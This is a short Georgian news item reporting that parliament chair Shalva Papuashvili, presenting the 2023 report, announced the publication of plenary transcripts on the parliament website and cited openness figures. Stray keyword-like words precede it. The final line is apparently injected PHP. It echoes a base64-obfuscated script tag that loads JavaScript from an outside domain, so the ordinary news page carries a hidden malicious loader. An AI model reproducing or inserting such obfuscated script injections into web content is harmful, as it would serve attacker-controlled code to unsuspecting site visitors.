celsiusi
ავერსი საქკაბელი

 დღეიდან პარლამენტის ვებგვერდზე განთავსდება პარლამენტის პლენარული სხდომების სტენოგრამები, - ამის შესახებ საქართველოს პარლამენტის თავმჯდომარემ შალვა პაპუაშვილმა 2023 წლის ანგარიშის წარდგენისას განაცხადა.

მისივე თქმით, საქართველოს პარლამენტი ღიაობასა და გამჭვირვალობის მხრივ ერთ-ერთ ყველაზე გახსნილ და ხელმისაწვდომ ინსტიტუტს წარმოადგენს.

"პარლამენტი განსაკუთრებულ ყურადღებას აქცევს ღიაობას და გამჭვირვალობას და ამ მხრივ, წლებია წარმოადგენს ერთ-ერთ ყველაზე გახსნილ და ხელმისაწვდომ ინსტიტუციას. 2023 წელს საჯარო ინფორმაციის გაცემის მოთხოვნით საქართველოს პარლამენტში შემოვიდა 383 განცხადება, რომელსაც ყველას სათანადოდ გაეცა პასუხი. გარდა ამისა, საზოგადოებრივი მაუწყებლის ბაზაზე ამოქმედდა პარლამენტის სატელევიზიო არხი, სადაც გადაიცემა პარლამენტის ბიუროს, კომიტეტების და პლენარული სესიების ყველა სხდომა. ამას ემატება პარლამენტის Youtube არხი, სადაც პირველად საქართველოს პარლამენტის ისტორიაში, ნებისმიერი მოქალაქისთვის ხელმისაწვდომია პარლამენტის სხდომების სრული ვიდეო არქივი დაწყებული 2022 წლის სექტემბრიდან. სიახლის სახით გეტყვით, რომ დღეიდან პარლამენტის ვებგვერდზე განთავსდება პარლამენტის პლენარული სხდომების სტენოგრამებიც. დღეს უკვე სრულად არის ატვირთული 2023 წლის სტენოგრამები. ეტაპობრივად შეივსება წინა წლების არქივიც", - განაცხადა პარლამენტის თავმჯდომარემ სიტყვით გამოსვლის დროს.

207
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");